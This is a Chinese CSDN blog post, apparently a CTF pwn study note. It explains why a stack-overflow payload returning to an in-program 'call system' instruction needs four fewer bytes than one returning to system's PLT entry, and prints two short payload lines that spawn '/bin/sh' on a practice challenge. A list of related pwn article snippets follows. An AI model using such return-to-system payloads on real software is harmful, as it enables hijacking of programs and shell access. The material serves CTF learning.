【PWN · 总结】call _system与system调用

最新推荐文章于 2023-09-08 21:55:10 发布
最新推荐文章于 2023-09-08 21:55:10 发布
阅读量628 收藏 6
点赞数 4
分类专栏: 【PWN · 总结】 文章标签: gadget call system ctf pwn
原文链接:https://blog.csdn.net/Morphy_Amo/article/details/121757953?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169069841816800188572413%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169069841816800188572413&biz_id=0&utm_med
版权
文章探讨了在栈溢出漏洞利用中,使用call_system与直接调用system的plt地址的区别。call_system可以节省栈空间,因为返回地址的push操作在调用后发生,而直接调用system需要在payload中包含返回地址和参数。文章提供了构造payload的例子,并指导如何通过交叉引用找到相关代码段进行分析。
摘要由CSDN通过智能技术生成

call _system 相比于直调system,可以节省栈空间哦~

前言

栈溢出漏洞但是限制溢出字符数,倒逼我们减少溢出内容。

习题:NSSCTF | 在线CTF平台

构造payload的时候有两种方式构造
第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址

system_addr = 0x08048320
binsh_addr = 0x0804a024
payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0)  + p32(binsh_addr)

第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用system的地址

system_addr = 0x08048320
binsh_addr = 0x0804a024
payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(binsh_addr)

为什么调用system的plt地址时,要比调用call system的调用地址时多构造四个字节?

首先,我们想要程序执行的是

system('/bin/sh');

合法的程序在编译这一步时,实际上执行的是

lea eax, [address_binsh_str]
push eax
call system

进一步对call指令进行分解,执行call指令相当于

push ip					;执行system_addr之后的返回地址
jmp system_addr

因此,直接调用system函数时,在system地址后面要接上一个返回地址,再接上system函数的参数

而如果调用的是call system的话,返回到call system之后,才会执行push ip的操作,这个时候的push操作不需要我们关心,因此payload直接就是call_system_addr + binsh_addr
————————————————
版权声明:本文为CSDN博主「Morphy_Amo」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Morphy_Amo/article/details/121757953

 利用方法

左侧找到相关函数,双击。 

选中一行 _system  按x键,即交叉引用,找到程序中用到_system的其他位置

即可找到相关代码段

2. pwn入门新手做system没有参数(内含函数调用过程),需要自己构造的攻防世界cgpwn2,求大佬指教
qiudalaojiao的博客
02-07 2075
我们拿到文件之后放到 linux里checksec一下 一个32位文件 ,开了nx 把文件拖入 ida f5开始分析 main 函数 我们看到了hello() 函数 点进去 进行分析 我们看到了比较重要的几行交互代码,,我们看看下面的部分首先要求我们输入一个名字,这个输入是通过fgets函数完成的,从键盘读取最多32h个字符到name区域 我上网百度了一下 fgets的函数原型 我们双击f...
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 920
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
linux内核分析之system_call.s
缘分天空
09-15 5166
1. 系统调用处理底层程序,通过int 0x80进行系统调用2. 时钟,硬盘,软盘中断处理程序信号,子进程结束SIG_CHLD = 17定义了从系统调用返回时各个寄存器在堆栈中的偏移值(ret_from_sys_call)EAX  = 0x00EBX  = 0x04ECX  = 0x08EDX  = 0x0CFS  = 0x10ES  = 0x14DS  = 0x18EIP  = 0x
Pwn_4 Function Call
weixin_30569001的博客
02-18 85
main(){F1(arg1,arg2)…printf(); //这个printf 的地址就称为返回地址 return address}push arg2push arg1call F1在执行F1函数之前,首先要将返回地址入栈,然后进入函数。mov esp,ebppop ebpret非常关键的一张图 溢出后向下覆盖,覆盖返回地址ret addr函数执行完 EBP和ESP相等mov esp,ebp...
system_call 系统调用
weixin_30247781的博客
03-29 108
其实做一个小的系统能给人带来些许的快乐和满足感,MenuOS之前完成过,知识之间是有联系的;system_call要求系统执行相应的指令,逐步访问,根本上还是C语言的应用。 刘占鹏 《Linux内核分析》MOOC课程http://mooc.study.163.com/course/USTC-1000029000 转载于:https://www.cnblogs.com/liuzp...
linux中call命令,各种linux命令(pwn)
weixin_39932455的博客
05-02 208
(gdb)bt //查看函数堆栈(gdb)info break //查看断点信息(gdb)x 0X804962c //相当于 *0X804962c(gdb)x /20i $eip //查看接下来20条指令(gdb)p system ...
计算机系统:深入解析System Call
m0_72410588的博客
09-08 1296
System Call是操作系统向用户空间程序提供的一组函数或接口,用于访问操作系统内核的功能和资源。通过System Call,应用程序可以请求操作系统完成诸如文件操作、内存管理、进程管理、网络通信等操作,从而实现对计算机系统的控制与利用。通过本篇博客的详细解析,我们对System Call有了更深入的了解。System Call作为计算机系统的重要组成部分,为应用程序与操作系统之间的交互提供了关键支持。无论是文件操作、进程管理还是网络通信,System Call都扮演着不可或缺的角色。
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1403
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 843
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 5204
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
3.pwn入门新手做无system泄露libc.so版本攻防世界pwn100 pwn200(dynelf 、libsearcher与got表plt表解)
qiudalaojiao的博客
02-12 2089
第一步:基地址 = 实际地址(泄露的got地址) – libc中对应函数的偏移 第二部:目的函数地址 = 基地址 + libc中对应函数的偏移 Dynelf 查找函数地址的典型方法是从泄漏的同一个库中的另一个函数的地址计算到所需函数的偏移量,然而,要使这种方法有效地工作,gLibc的远程服务器版本需要与我们的相同。我们还可以通过泄漏一些函数并在libcdb.com中搜索找到gLibc的远程版本,但...
systemcall---系统调用
luotuoass
12-15 250
http://www.ibm.com/developerworks/cn/linux/l-system-calls/ 系统调用就是用户空间应用程序和内核提供的服务之间的一个接口。由于服务是在内核中提供的,因此无法执行直接调用;相反,您必须使用一个进程来跨越用户空间与内核之间的界限。在特定架构中实现此功能的方法会有所不同。因此,本文将着眼于最通用的架构 —— i386。 在本文中,我...
详细分析system_call
shazhoulada1的专栏
04-02 1258
黄志恒 原创作品转载请注明出处 《Linux内核分析》MOOC课程 http://mooc.study.163.com/course/USTC-1000029000本篇文章从上篇的getgid()说起。我们在之前的MenuOS中加入getgid()功能。然后在getgid处打断点,然后看看这系统调用详细是怎么搞的。先上图。 首先是修改MenuOS的代码。在test.c中加上getgid()方
SystemC Functions
元直的博客
10-24 235
SystemC Functions 一、SystemC FunctionsSyntax type function_name (arguments) { function_body; } where, type – functions will return an value, type specifies the return type function_name – name of the function arguments – arguments to the functio.
[SystemC]SystemC Functions
元直的博客
04-01 287
SystemC Functions function is group of statements to perform the specific task. 一、Syntax: type function_name (arguments) { function_body; } where,...
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2898
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
Pwn 学习
qq_41672971的博客
09-26 1403
windows pwn
pwn学习】pwn中直接调用system和调用call system的区别
Morphy_Amo的博客
12-06 2684
以 XCTF-pwn-新手区-004 为例, 本题在构造payload的时候有两种方式构造 第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址 system_addr = 0x08048320 binsh_addr = 0x0804a024 payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr) 第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用syste
操作系统学习笔记_02_系统调用(System Call)简述与分类
WinterShiver
03-17 2296
系统调用是获取操作系统服务的一系列接口,它们通常用C/C++编写,对于一些底层操作也采用汇编语言编写。这些接口提供最基本的操作,是面向程序提供的——程序员通过引用一系列的系统调用编写程序,操作系统在执行程序时按有关描述依次执行系统调用,提供相应的服务。然而,因为系统调用的操作过于基本,所以即使任务非常简单,程序也要多次执行系统操作,使用大量的系统调用;另外,系统调用的指令名称和功能因系统而异,...
没有system函数的pwn
最新发布
11-16
没有`system`函数的pwn指的是在pwn题目中,限制了我们不能直接使用`system`函数来执行系统命令的情况,这通常是出于安全考虑,以防止恶意用户滥用系统权限。 在这种情况下,我们需要使用一些其他的方法来达到我们的...
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值